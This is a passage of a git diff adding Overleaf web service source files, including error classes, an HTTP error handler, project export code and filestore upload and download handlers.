res.sendStatus(500) + } +} + +module.exports = { + notFound, + forbidden, + serverError, + handleError: expressifyErrorHandler(handleError), + handleApiError, +} diff --git a/services/web/app/src/Features/Errors/Errors.js b/services/web/app/src/Features/Errors/Errors.js new file mode 100644 index 0000000..8a21b60 --- /dev/null +++ b/services/web/app/src/Features/Errors/Errors.js @@ -0,0 +1,359 @@ +const OError = require('@overleaf/o-error') +const settings = require('@overleaf/settings') + +// Error class for legacy errors so they inherit OError while staying +// backward-compatible (can be instantiated with string as argument instead +// of object) +class BackwardCompatibleError extends OError { + /** + * @param {string | { message: string, info?: Object }} messageOrOptions + */ + constructor(messageOrOptions) { + if (typeof messageOrOptions === 'string') { + super(messageOrOptions) + } else if (messageOrOptions) { + const { message, info } = messageOrOptions + super(message, info) + } else { + super() + } + } +} + +// Error class that facilitates the migration to OError v3 by providing +// a signature in which the 2nd argument can be an object containing +// the `info` object. +class OErrorV2CompatibleError extends OError { + constructor(message, options) { + if (options) { + super(message, options.info) + } else { + super(message) + } + } +} + +class NotFoundError extends BackwardCompatibleError {} + +class ForbiddenError extends BackwardCompatibleError {} + +class ServiceNotConfiguredError extends BackwardCompatibleError {} + +class TooManyRequestsError extends BackwardCompatibleError {} + +class DuplicateNameError extends OError {} + +class InvalidNameError extends BackwardCompatibleError {} + +class UnsupportedFileTypeError extends BackwardCompatibleError {} + +class FileTooLargeError extends BackwardCompatibleError {} + +class UnsupportedExportRecordsError extends BackwardCompatibleError {} + +class V1HistoryNotSyncedError extends BackwardCompatibleError {} + +class ProjectHistoryDisabledError extends BackwardCompatibleError {} + +class V1ConnectionError extends BackwardCompatibleError {} + +class UnconfirmedEmailError extends BackwardCompatibleError {} + +class EmailExistsError extends OErrorV2CompatibleError { + constructor(options) { + super('Email already exists', options) + } +} + +class InvalidError extends BackwardCompatibleError {} + +class NotInV2Error extends BackwardCompatibleError {} + +class SLInV2Error extends BackwardCompatibleError {} + +class SAMLCommonsUnavailable extends OError { + get i18nKey() { + return 'saml_commons_unavailable' + } +} + +class SAMLIdentityExistsError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_already_registered' + } +} + +class SAMLAlreadyLinkedError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_already_linked' + } +} + +class SAMLEmailNotAffiliatedError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_not_affiliated' + } +} + +class SAMLEmailAffiliatedWithAnotherInstitutionError extends OError { + get i18nKey() { + return 'institution_account_tried_to_add_affiliated_with_another_institution' + } +} + +class SAMLAuthenticationError extends OError { + get i18nKey() { + return 'saml_auth_error' + } +} +class SAMLAssertionAudienceMismatch extends SAMLAuthenticationError {} + +class SAMLAuthenticationRequiredError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_authentication_required_error' + } +} + +class SAMLGroupSSOLoginIdentityMismatchError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_identity_mismatch_error' + } +} + +class SAMLGroupSSOLoginIdentityNotFoundError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_identity_not_found_error' + } +} + +class SAMLGroupSSODisabledError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_disabled_error' + } +} + +class SAMLInvalidSignatureError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_invalid_signature_error' + } +} + +class SAMLMissingSignatureError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_missing_signature_error' + } +} + +class SAMLInvalidUserIdentifierError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_authentication_required_error' + } +} + +class SAMLInvalidUserAttributeError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_authentication_required_error' + } +} + +class SAMLMissingUserIdentifierError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_missing_user_attribute' + } +} + +class SAMLInvalidResponseError extends SAMLAuthenticationError {} + +class SAMLResponseAlreadyProcessedError extends SAMLInvalidResponseError { + constructor() { + super('saml response already processed') + } +} + +class SAMLLoginFailureError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_login_failure' + } +} + +class SAMLEmailNotRecognizedError extends SAMLAuthenticationError { + get i18nKey() { + return 'saml_email_not_recognized' + } +} + +class SAMLSessionDataMissing extends BackwardCompatibleError { + constructor(arg) { + super(arg) + + const samlSession = + typeof arg === 'object' && arg !== null && arg.samlSession + ? arg.samlSession + : {} + this.tryAgain = true + const { universityId, universityName, externalUserId, institutionEmail } = + samlSession + + if ( + !universityId && + !universityName && + !externalUserId && + !institutionEmail + ) { + this.message = 'Missing session data.' + } else if ( + !institutionEmail && + samlSession && + samlSession.userEmailAttributeUnreliable + ) { + this.tryAgain = false + this.message = `Your account settings at your institution prevent us from accessing your email address. You will need to make your email address public at your institution in order to link with ${settings.appName}. Please contact your IT department if you have any questions.` + } else if (!institutionEmail) { + this.message = + 'Unable to confirm your institutional email address. The institutional identity provider did not provide an email address in the expected attribute. Please contact us if this keeps happening.' + } + } +} + +class SAMLProviderRequesterError extends SAMLAuthenticationError {} + +class ThirdPartyIdentityExistsError extends BackwardCompatibleError { + constructor(arg) { + super(arg) + if (!this.message) { + this.message = + 'provider and external id already linked to another account' + } + } +} + +class ThirdPartyUserNotFoundError extends BackwardCompatibleError { + constructor(arg) { + super(arg) + if (!this.message) { + this.message = 'user not found for provider and external id' + } + } +} + +class OutputFileFetchFailedError extends OError {} + +class SubscriptionAdminDeletionError extends OErrorV2CompatibleError { + constructor(options) { + super('subscription admins cannot be deleted', options) + } +} + +class SubscriptionNotFoundError extends OErrorV2CompatibleError { + constructor(options) { + super('subscription not found', options) + } +} + +class ProjectNotFoundError extends OErrorV2CompatibleError { + constructor(options) { + super('project not found', options) + } +} + +class UserNotFoundError extends OErrorV2CompatibleError { + constructor(options) { + super('user not found', options) + } +} + +class UserNotCollaboratorError extends OErrorV2CompatibleError { + constructor(options) { + super('user not a collaborator', options) + } +} + +class DocHasRangesError extends OErrorV2CompatibleError { + constructor(options) { + super('document has ranges', options) + } +} + +class InvalidQueryError extends OErrorV2CompatibleError { + constructor(options) { + super('invalid search query', options) + } +} + +class AffiliationError extends OError {} + +class InvalidEmailError extends OError { + get i18nKey() { + return 'invalid_email' + } +} + +class InvalidInstitutionalEmailError extends OError { + get i18nKey() { + return 'invalid_institutional_email' + } +} + +class NonDeletableEntityError extends OError { + get i18nKey() { + return 'non_deletable_entity' + } +} + +module.exports = { + OError, + BackwardCompatibleError, + NotFoundError, + ForbiddenError, + ServiceNotConfiguredError, + TooManyRequestsError, + DuplicateNameError, + InvalidNameError, + UnsupportedFileTypeError, + FileTooLargeError, + UnsupportedExportRecordsError, + V1HistoryNotSyncedError, + ProjectHistoryDisabledError, + V1ConnectionError, + UnconfirmedEmailError, + EmailExistsError, + InvalidError, + NotInV2Error, + OutputFileFetchFailedError, + SAMLAssertionAudienceMismatch, + SAMLAuthenticationRequiredError, + SAMLCommonsUnavailable, + SAMLIdentityExistsError, + SAMLAlreadyLinkedError, + SAMLEmailNotAffiliatedError, + SAMLEmailAffiliatedWithAnotherInstitutionError, + SAMLSessionDataMissing, + SAMLAuthenticationError, + SAMLGroupSSOLoginIdentityMismatchError, + SAMLGroupSSOLoginIdentityNotFoundError, + SAMLGroupSSODisabledError, + SAMLInvalidUserAttributeError, + SAMLInvalidUserIdentifierError, + SAMLInvalidSignatureError, + SAMLMissingUserIdentifierError, + SAMLMissingSignatureError, + SAMLProviderRequesterError, + SAMLInvalidResponseError, + SAMLLoginFailureError, + SAMLEmailNotRecognizedError, + SAMLResponseAlreadyProcessedError, + SLInV2Error, + ThirdPartyIdentityExistsError, + ThirdPartyUserNotFoundError, + SubscriptionAdminDeletionError, + SubscriptionNotFoundError, + ProjectNotFoundError, + UserNotFoundError, + UserNotCollaboratorError, + DocHasRangesError, + InvalidQueryError, + AffiliationError, + InvalidEmailError, + InvalidInstitutionalEmailError, + NonDeletableEntityError, +} diff --git a/services/web/app/src/Features/Errors/HttpErrorHandler.js b/services/web/app/src/Features/Errors/HttpErrorHandler.js new file mode 100644 index 0000000..c3fab88 --- /dev/null +++ b/services/web/app/src/Features/Errors/HttpErrorHandler.js @@ -0,0 +1,160 @@ +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { plainTextResponse } = require('../../infrastructure/Response') + +function renderJSONError(res, message, info = {}) { + if (info.message) { + logger.warn( + info, + `http error info shouldn't contain a 'message' field, will be overridden` + ) + } + if (message != null) { + res.json({ ...info, message }) + } else { + res.json(info) + } +} + +function handleGeneric500Error(req, res, statusCode, message) { + res.status(statusCode) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/500', { title: 'Server Error' }) + case 'json': + return renderJSONError(res, message) + default: + return plainTextResponse(res, 'internal server error') + } +} + +function handleGeneric400Error(req, res, statusCode, message, info = {}) { + res.status(statusCode) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/400', { + title: 'Client Error', + message, + }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'client error') + } +} + +let HttpErrorHandler +module.exports = HttpErrorHandler = { + handleErrorByStatusCode(req, res, err, statusCode) { + const is400Error = statusCode >= 400 && statusCode < 500 + const is500Error = statusCode >= 500 && statusCode < 600 + + req.logger.addFields({ err }) + if (is400Error) { + req.logger.setLevel('warn') + } else if (is500Error) { + req.logger.setLevel('error') + } + + if (statusCode === 403) { + HttpErrorHandler.forbidden(req, res) + } else if (statusCode === 404) { + HttpErrorHandler.notFound(req, res) + } else if (statusCode === 409) { + HttpErrorHandler.conflict(req, res, '') + } else if (statusCode === 422) { + HttpErrorHandler.unprocessableEntity(req, res) + } else if (is400Error) { + handleGeneric400Error(req, res, statusCode) + } else if (is500Error) { + handleGeneric500Error(req, res, statusCode) + } else { + res.sendStatus(500) + } + }, + + badRequest(req, res, message, info = {}) { + handleGeneric400Error(req, res, 400, message, info) + }, + + conflict(req, res, message, info = {}) { + res.status(409) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/400', { + title: 'Client Error', + message, + }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'conflict') + } + }, + + forbidden(req, res, message = 'restricted', info = {}) { + res.status(403) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('user/restricted', { title: 'restricted' }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'restricted') + } + }, + + notFound(req, res, message = 'not found', info = {}) { + res.status(404) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/404', { title: 'page_not_found' }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'not found') + } + }, + + unprocessableEntity(req, res, message = 'unprocessable entity', info = {}) { + res.status(422) + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/400', { + title: 'Client Error', + message, + }) + case 'json': + return renderJSONError(res, message, info) + default: + return plainTextResponse(res, 'unprocessable entity') + } + }, + + legacyInternal(req, res, message, err) { + req.logger.addFields({ err }) + req.logger.setLevel('error') + handleGeneric500Error(req, res, 500, message) + }, + + maintenance(req, res) { + // load balancer health checks require a success response for / + if (req.url === '/') { + res.status(200) + } else { + res.status(503) + } + let message = `${Settings.appName} is currently down for maintenance.` + if (Settings.statusPageUrl) { + message += ` Please check https://${Settings.statusPageUrl} for updates.` + } + switch (req.accepts(['html', 'json'])) { + case 'html': + return res.render('general/closed', { title: 'maintenance' }) + case 'json': + return renderJSONError(res, message, {}) + default: + return plainTextResponse(res, message) + } + }, +} diff --git a/services/web/app/src/Features/Exports/ExportsController.mjs b/services/web/app/src/Features/Exports/ExportsController.mjs new file mode 100644 index 0000000..28261cb --- /dev/null +++ b/services/web/app/src/Features/Exports/ExportsController.mjs @@ -0,0 +1,128 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import ExportsHandler from './ExportsHandler.mjs' + +import SessionManager from '../Authentication/SessionManager.js' +import logger from '@overleaf/logger' + +export default { + exportProject(req, res, next) { + const { project_id: projectId, brand_variation_id: brandVariationId } = + req.params + const userId = SessionManager.getLoggedInUserId(req.session) + const exportParams = { + project_id: projectId, + brand_variation_id: brandVariationId, + user_id: userId, + } + + if (req.body) { + if (req.body.firstName) { + exportParams.first_name = req.body.firstName.trim() + } + if (req.body.lastName) { + exportParams.last_name = req.body.lastName.trim() + } + // additional parameters for gallery exports + if (req.body.title) { + exportParams.title = req.body.title.trim() + } + if (req.body.description) { + exportParams.description = req.body.description.trim() + } + if (req.body.author) { + exportParams.author = req.body.author.trim() + } + if (req.body.license) { + exportParams.license = req.body.license.trim() + } + if (req.body.showSource != null) { + exportParams.show_source = req.body.showSource + } + } + + return ExportsHandler.exportProject( + exportParams, + function (err, exportData) { + if (err != null) { + if (err.forwardResponse != null) { + logger.debug( + { responseError: err.forwardResponse }, + 'forwarding response' + ) + const statusCode = err.forwardResponse.status || 500 + return res.status(statusCode).json(err.forwardResponse) + } else { + return next(err) + } + } + logger.debug( + { + userId, + projectId, + brandVariationId, + exportV1Id: exportData.v1_id, + }, + 'exported project' + ) + return res.json({ + export_v1_id: exportData.v1_id, + message: exportData.message, + }) + } + ) + }, + + exportStatus(req, res) { + const { export_id: exportId } = req.params + return ExportsHandler.fetchExport(exportId, function (err, exportJson) { + let json + if (err != null) { + json = { + status_summary: 'failed', + status_detail: err.toString, + } + res.json({ export_json: json }) + return err + } + const parsedExport = JSON.parse(exportJson) + json = { + status_summary: parsedExport.status_summary, + status_detail: parsedExport.status_detail, + partner_submission_id: parsedExport.partner_submission_id, + v2_user_email: parsedExport.v2_user_email, + v2_user_first_name: parsedExport.v2_user_first_name, + v2_user_last_name: parsedExport.v2_user_last_name, + title: parsedExport.title, + token: parsedExport.token, + } + return res.json({ export_json: json }) + }) + }, + + exportDownload(req, res, next) { + const { type, export_id: exportId } = req.params + + SessionManager.getLoggedInUserId(req.session) + return ExportsHandler.fetchDownload( + exportId, + type, + function (err, exportFileUrl) { + if (err != null) { + return next(err) + } + + return res.redirect(exportFileUrl) + } + ) + }, +} diff --git a/services/web/app/src/Features/Exports/ExportsHandler.mjs b/services/web/app/src/Features/Exports/ExportsHandler.mjs new file mode 100644 index 0000000..4ef5fea --- /dev/null +++ b/services/web/app/src/Features/Exports/ExportsHandler.mjs @@ -0,0 +1,282 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import OError from '@overleaf/o-error' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectHistoryHandler from '../Project/ProjectHistoryHandler.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import ProjectRootDocManager from '../Project/ProjectRootDocManager.js' +import UserGetter from '../User/UserGetter.js' +import logger from '@overleaf/logger' +import settings from '@overleaf/settings' +import async from 'async' +import Request from 'request' +let ExportsHandler +const request = Request.defaults() + +export default ExportsHandler = { + exportProject(exportParams, callback) { + if (callback == null) { + callback = function () {} + } + return ExportsHandler._buildExport( + exportParams, + function (err, exportData) { + if (err != null) { + return callback(err) + } + return ExportsHandler._requestExport(exportData, function (err, body) { + if (err != null) { + return callback(err) + } + exportData.v1_id = body.exportId + exportData.message = body.message + // TODO: possibly store the export data in Mongo + return callback(null, exportData) + }) + } + ) + }, + + _buildExport(exportParams, callback) { + if (callback == null) { + callback = function () {} + } + const { + project_id: projectId, + user_id: userId, + brand_variation_id: brandVariationId, + title, + description, + author, + license, + show_source: showSource, + } = exportParams + const jobs = { + project(cb) { + return ProjectGetter.getProject(projectId, cb) + }, + rootDoc: [ + 'project', + (results, cb) => + ProjectRootDocManager.ensureRootDocumentIsValid( + projectId, + function (error) { + if (error != null) { + return callback(error) + } + return ProjectLocator.findRootDoc( + { project: results.project, project_id: projectId }, + cb + ) + } + ), + ], + user(cb) { + return UserGetter.getUser( + userId, + { first_name: 1, last_name: 1, email: 1, overleaf: 1 }, + cb + ) + }, + historyVersion(cb) { + return ProjectHistoryHandler.ensureHistoryExistsForProject( + projectId, + function (error) { + if (error != null) { + return callback(error) + } + return ExportsHandler._requestVersion(projectId, cb) + } + ) + }, + } + + return async.auto(jobs, function (err, results) { + if (err != null) { + OError.tag(err, 'error building project export', { + project_id: projectId, + user_id: userId, + brand_variation_id: brandVariationId, + }) + return callback(err) + } + + const { project, rootDoc, user, historyVersion } = results + if (!rootDoc || rootDoc[1] == null) { + err = new OError('cannot export project without root doc', { + project_id: projectId, + }) + return callback(err) + } + + if (exportParams.first_name && exportParams.last_name) { + user.first_name = exportParams.first_name + user.last_name = exportParams.last_name + } + + const exportData = { + project: { + id: projectId, + rootDocPath: rootDoc[1] != null ? rootDoc[1].fileSystem : undefined, + historyId: project.overleaf?.history?.id, + historyVersion, + v1ProjectId: + project.overleaf != null ? project.overleaf.id : undefined, + metadata: { + compiler: project.compiler, + imageName: project.imageName, + title, + description, + author, + license, + showSource, + }, + }, + user: { + id: userId, + firstName: user.first_name, + lastName: user.last_name, + email: user.email, + orcidId: null, // until v2 gets ORCID + v1UserId: user.overleaf != null ? user.overleaf.id : undefined, + }, + destination: { + brandVariationId, + }, + options: { + callbackUrl: null, + }, // for now, until we want v1 to call us back + } + return callback(null, exportData) + }) + }, + + _requestExport(exportData, callback) { + if (callback == null) { + callback = function () {} + } + return request.post( + { + url: `${settings.apis.v1.url}/api/v1/overleaf/exports`, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + json: exportData, + timeout: settings.apis.v1.timeout, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to v1 export', { + export: exportData, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body) + } else { + logger.warn( + { export: exportData }, + `v1 export returned failure; forwarding: ${body}` + ) + // pass the v1 error along for the publish modal to handle + const err = { forwardResponse: body } + return callback(err) + } + } + ) + }, + + _requestVersion(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${settings.apis.project_history.url}/project/${projectId}/version`, + json: true, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to project history', { + project_id: projectId, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body.version) + } else { + err = new OError( + `project history version returned a failure status code: ${res.statusCode}`, + { project_id: projectId } + ) + return callback(err) + } + } + ) + }, + + fetchExport(exportId, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${settings.apis.v1.url}/api/v1/overleaf/exports/${exportId}`, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + timeout: settings.apis.v1.timeout, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to v1 export', { + export: exportId, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body) + } else { + err = new OError( + `v1 export returned a failure status code: ${res.statusCode}`, + { export: exportId } + ) + return callback(err) + } + } + ) + }, + + fetchDownload(exportId, type, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${settings.apis.v1.url}/api/v1/overleaf/exports/${exportId}/${type}_url`, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + timeout: settings.apis.v1.timeout, + }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error making request to v1 export', { + export: exportId, + }) + return callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null, body) + } else { + err = new OError( + `v1 export returned a failure status code: ${res.statusCode}`, + { export: exportId } + ) + return callback(err) + } + } + ) + }, +} diff --git a/services/web/app/src/Features/FileStore/FileHashManager.js b/services/web/app/src/Features/FileStore/FileHashManager.js new file mode 100644 index 0000000..e90f93b --- /dev/null +++ b/services/web/app/src/Features/FileStore/FileHashManager.js @@ -0,0 +1,61 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let FileHashManager +const crypto = require('crypto') +const logger = require('@overleaf/logger') +const fs = require('fs') +const _ = require('lodash') + +module.exports = FileHashManager = { + computeHash(filePath, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) // avoid double callbacks + + // taken from v1/history/storage/lib/blob_hash.js + const getGitBlobHeader = byteLength => `blob ${byteLength}` + '\x00' + + const getByteLengthOfFile = cb => + fs.stat(filePath, function (err, stats) { + if (err != null) { + return cb(err) + } + return cb(null, stats.size) + }) + + return getByteLengthOfFile(function (err, byteLength) { + if (err != null) { + return callback(err) + } + + const input = fs.createReadStream(filePath) + input.on('error', function (err) { + logger.warn({ filePath, err }, 'error opening file in computeHash') + return callback(err) + }) + + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update(getGitBlobHeader(byteLength)) + hash.on('readable', function () { + const result = hash.read() + if (result != null) { + return callback(null, result.toString('hex')) + } + }) + return input.pipe(hash) + }) + }, +} diff --git a/services/web/app/src/Features/FileStore/FileStoreController.mjs b/services/web/app/src/Features/FileStore/FileStoreController.mjs new file mode 100644 index 0000000..e4e55c7 --- /dev/null +++ b/services/web/app/src/Features/FileStore/FileStoreController.mjs @@ -0,0 +1,207 @@ +// @ts-check + +import { pipeline } from 'node:stream/promises' +import logger from '@overleaf/logger' +import { expressify } from '@overleaf/promise-utils' +import Metrics from '@overleaf/metrics' +import FileStoreHandler from './FileStoreHandler.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import HistoryManager from '../History/HistoryManager.js' +import Errors from '../Errors/Errors.js' +import Features from '../../infrastructure/Features.js' +import { preparePlainTextResponse } from '../../infrastructure/Response.js' + +async function getFile(req, res) { + const projectId = req.params.Project_id + const fileId = req.params.File_id + const queryString = req.query + const userAgent = req.get('User-Agent') + req.logger.addFields({ projectId, fileId, queryString }) + + let file + try { + ;({ element: file } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: fileId, + type: 'file', + })) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + logger.warn( + { err, projectId, fileId, queryString }, + 'entity not found when downloading file' + ) + // res.sendStatus() sends a description of the status as body. + // Using res.status().end() avoids sending that fake body. + return res.status(404).end() + } else { + // Instead of using the global error handler, we send an empty response in + // case the client forgets to check the response status. This is arguably + // not our responsibility, and it won't work if something else breaks in + // this endpoint, so it could be revisited in the future. + logger.err( + { err, projectId, fileId, queryString }, + 'error finding element for downloading file' + ) + return res.status(500).end() + } + } + + // This metric has this name because it used to be recorded in a middleware. + // It tracks how many files have a hash and can be served by the history + // system. + Metrics.inc('fileToBlobRedirectMiddleware', 1, { + method: 'GET', + status: Boolean(file?.hash), + }) + + let source, stream, contentLength + try { + if (Features.hasFeature('project-history-blobs') && file?.hash) { + // Get the file from history + ;({ source, stream, contentLength } = + await HistoryManager.promises.requestBlobWithFallback( + projectId, + file.hash, + fileId + )) + } else { + // The file-hash is missing. Fall back to filestore. + stream = await FileStoreHandler.promises.getFileStream( + projectId, + fileId, + queryString + ) + source = 'filestore' + } + } catch (err) { + if (err instanceof Errors.NotFoundError) { + return res.status(404).end() + } else { + logger.err( + { err, projectId, fileId, queryString }, + 'error finding element for downloading file' + ) + return res.status(500).end() + } + } + + // mobile safari will try to render html files, prevent this + if (isMobileSafari(userAgent) && isHtml(file)) { + preparePlainTextResponse(res) + } + if (contentLength) { + res.setHeader('Content-Length', contentLength) + } + res.setContentDisposition('attachment', { filename: file.name }) + // allow the browser to cache these immutable files + // note: both "private" and "max-age" appear to be required for caching + res.setHeader('Cache-Control', 'private, max-age=3600') + res.appendHeader('X-Served-By', source) + try { + await pipeline(stream, res) + } catch (err) { + if ( + err instanceof Error && + 'code' in err && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) { + // Ignore clients closing the connection prematurely + return + } + throw err + } +} + +async function getFileHead(req, res) { + const projectId = req.params.Project_id + const fileId = req.params.File_id + + let file + try { + ;({ element: file } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: fileId, + type: 'file', + })) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + // res.sendStatus() sends a description of the status as body. + // Using res.status().end() avoids sending that fake body. + return res.status(404).end() + } else { + // Instead of using the global error handler, we send an empty response in + // case the client forgets to check the response status. This is arguably + // not our responsibility, and it won't work if something else breaks in + // this endpoint, so it could be revisited in the future. + logger.err( + { err, projectId, fileId }, + 'error finding element for downloading file' + ) + return res.status(500).end() + } + } + + // This metric has this name because it used to be recorded in a middleware. + // It tracks how many files have a hash and can be served by the history + // system. + Metrics.inc('fileToBlobRedirectMiddleware', 1, { + method: 'HEAD', + status: Boolean(file?.hash), + }) + + let fileSize, source + try { + if (Features.hasFeature('project-history-blobs') && file?.hash) { + ;({ source, contentLength: fileSize } = + await HistoryManager.promises.requestBlobWithFallback( + projectId, + file.hash, + fileId, + 'HEAD' + )) + } else { + fileSize = await FileStoreHandler.promises.getFileSize(projectId, fileId) + source = 'filestore' + } + } catch (err) { + if (err instanceof Errors.NotFoundError) { + return res.status(404).end() + } else { + logger.err({ err, projectId, fileId }, 'error obtaining file size') + return res.status(500).end() + } + } + + res.setHeader('Content-Length', fileSize) + res.appendHeader('X-Served-By', source) + res.status(200).end() +} + +function isHtml(file) { + return ( + fileEndsWith(file, '.html') || + fileEndsWith(file, '.htm') || + fileEndsWith(file, '.xhtml') + ) +} + +function fileEndsWith(file, ext) { + return ( + file.name != null && + file.name.length > ext.length && + file.name.lastIndexOf(ext) === file.name.length - ext.length + ) +} + +function isMobileSafari(userAgent) { + return ( + userAgent && + (userAgent.indexOf('iPhone') >= 0 || userAgent.indexOf('iPad') >= 0) + ) +} + +export default { + getFile: expressify(getFile), + getFileHead: expressify(getFileHead), +} diff --git a/services/web/app/src/Features/FileStore/FileStoreHandler.js b/services/web/app/src/Features/FileStore/FileStoreHandler.js new file mode 100644 index 0000000..66ba94b --- /dev/null +++ b/services/web/app/src/Features/FileStore/FileStoreHandler.js @@ -0,0 +1,372 @@ +const _ = require('lodash') +const logger = require('@overleaf/logger') +const fs = require('fs') +const request = require('request') +const settings = require('@overleaf/settings') +const Async = require('async') +const FileHashManager = require('./FileHashManager') +const HistoryManager = require('../History/HistoryManager') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const { File } = require('../../models/File') +const Errors = require('../Errors/Errors') +const OError = require('@overleaf/o-error') +const { promisifyAll } = require('@overleaf/promise-utils') +const Features = require('../../infrastructure/Features') + +const ONE_MIN_IN_MS = 60 * 1000 +const FIVE_MINS_IN_MS = ONE_MIN_IN_MS * 5 + +const FileStoreHandler = { + RETRY_ATTEMPTS: 3, + + uploadFileFromDisk(projectId, fileArgs, fsPath, callback) { + // Look up the history id for the project if we don't have it already + ProjectDetailsHandler.getDetails(projectId, function (err, project) { + if (err) { + return callback(err) + } + const historyId = project.overleaf?.history?.id + if (!historyId) { + return callback(new OError('missing history id')) + } + FileStoreHandler.uploadFileFromDiskWithHistoryId( + projectId, + historyId, + fileArgs, + fsPath, + callback + ) + }) + }, + + _uploadToHistory(historyId, hash, size, fsPath, callback) { + if (Features.hasFeature('project-history-blobs')) { + Async.retry( + FileStoreHandler.RETRY_ATTEMPTS, + cb => + HistoryManager.uploadBlobFromDisk(historyId, hash, size, fsPath, cb), + error => { + if (error) return callback(error, false) + callback(null, true) + } + ) + } else { + callback(null, false) + } + }, + + _uploadToFileStore(projectId, fileArgs, fsPath, callback) { + Async.retry( + FileStoreHandler.RETRY_ATTEMPTS, + (cb, results) => + FileStoreHandler._doUploadFileFromDisk(projectId, fileArgs, fsPath, cb), + callback + ) + }, + + uploadFileFromDiskWithHistoryId( + projectId, + historyId, + fileArgs, + fsPath, + callback + ) { + fs.lstat(fsPath, function (err, stat) { + if (err) { + logger.warn({ err, projectId, fileArgs, fsPath }, 'error stating file') + callback(err) + } + if (!stat) { + logger.warn( + { projectId, fileArgs, fsPath }, + 'stat is not available, can not check file from disk' + ) + return callback(new Error('error getting stat, not available')) + } + if (!stat.isFile()) { + logger.debug( + { projectId, fileArgs, fsPath }, + 'tried to upload symlink, not continuing' + ) + return callback(new Error('can not upload symlink')) + } + FileHashManager.computeHash(fsPath, function (err, hash) { + if (err) { + return callback(err) + } + FileStoreHandler._uploadToHistory( + historyId, + hash, + stat.size, + fsPath, + function (err, createdBlob) { + if (err) { + return callback(err) + } + fileArgs = { ...fileArgs, hash } + FileStoreHandler._uploadToFileStore( + projectId, + fileArgs, + fsPath, + function (err, result) { + if (err) { + OError.tag(err, 'Error uploading file, retries failed', { + projectId, + fileArgs, + }) + return callback(err) + } + callback(err, result.url, result.fileRef, createdBlob) + } + ) + } + ) + }) + }) + }, + + _doUploadFileFromDisk(projectId, fileArgs, fsPath, callback) { + const callbackOnce = _.once(callback) + + const fileRef = new File(fileArgs) + const fileId = fileRef._id + const url = FileStoreHandler._buildUrl(projectId, fileId) + + if (!Features.hasFeature('filestore')) { + return callbackOnce(null, { url, fileRef }) + } + + const readStream = fs.createReadStream(fsPath) + readStream.on('error', function (err) { + logger.warn( + { err, projectId, fileId, fsPath }, + 'something went wrong on the read stream of uploadFileFromDisk' + ) + callbackOnce(err) + }) + readStream.on('open', function () { + const opts = { + method: 'post', + uri: url, + 